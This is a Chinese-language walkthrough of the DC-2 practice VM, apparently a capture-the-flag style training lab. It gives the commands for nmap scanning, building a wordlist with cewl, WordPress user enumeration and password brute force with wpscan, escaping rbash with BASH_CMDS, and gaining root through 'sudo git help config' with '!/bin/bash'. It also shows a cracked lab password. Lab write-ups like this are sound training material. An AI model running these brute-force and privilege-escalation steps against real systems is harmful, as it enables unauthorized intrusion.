DC-2靶机练习

DC-2靶场下载地址http://www.five86.com/downloads/DC-2.zip

在vmware中打开DC-2.ova文件

将DC-2配置成NAT模式联网，与Kali同网段，开机后看到登陆画面即可开始练习

首先进入kali

使用Nmap工具扫描同C段下其他主机和开放的端口

nmap -sV -T4 -p 0-65535 192.168.47.0/24

扫描到了80 http端口 和 7744 ssh端口  

直接访问192.168.47.136:80

如果访问不到网站但是扫描的到80端口则到

C:\Windows\System32\drivers\etc 目录下修改host文件

192.168.47.136        dc-2

 提示使用cewl工具

Cewl介绍

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。

cewl -w passwd.txt http://dc-2/ 
-w： –write：将输出结果写入到文件 passwd.txt中

 同时使用kali自带的域名扫描工具dirb 扫描一下网站的子域名

得到后台管理登陆地址

dc-2/wp-admin/user/admin.php

页面最底部可以看到搭建框架为worldpress，即可使用wpscan

wpscan可以扫描主题漏洞、插件漏洞和wp自身的漏洞

用法：wpscan --url http://dc-2 --enumerate u 枚举wp的用户名

收集到了 tom,jerry,admin三个用户名

将三个用户名添加到user.txt文件中

然后用wpscan直接爆破

wpscan --url http://dc-2/ -U user.txt -P passwd.txt

 

成功爆破到两个可以使用的账号密码

jerry和tom直接去登陆后台 发现flag2

 提示使用另一个入口点，也就是代表端口 7744 ssh服务

我这里使用xshell进行连接 发现当前目录下只有flag3.txt 和 一个usr文件夹

cat flag3.txt 发现不可以执行 提示-rbash

使用rbash绕过

输入：BASH_CMDS[a]=/bin/sh;a

然后 /bin/bash

加一个环境变量： export PATH=$PATH:/bin/

 得到flag3的内容     提示提权    尝试登陆jerry的用户

su jerry

输入爆破得到的密码 adipiscing

 使用git提权为root用户视图

sudo git help config        #在末行命令模式输入 
!/bin/bash 或 !'sh'         #完成提权 

 进入到/root目录下 发现最终的flag

 Well done！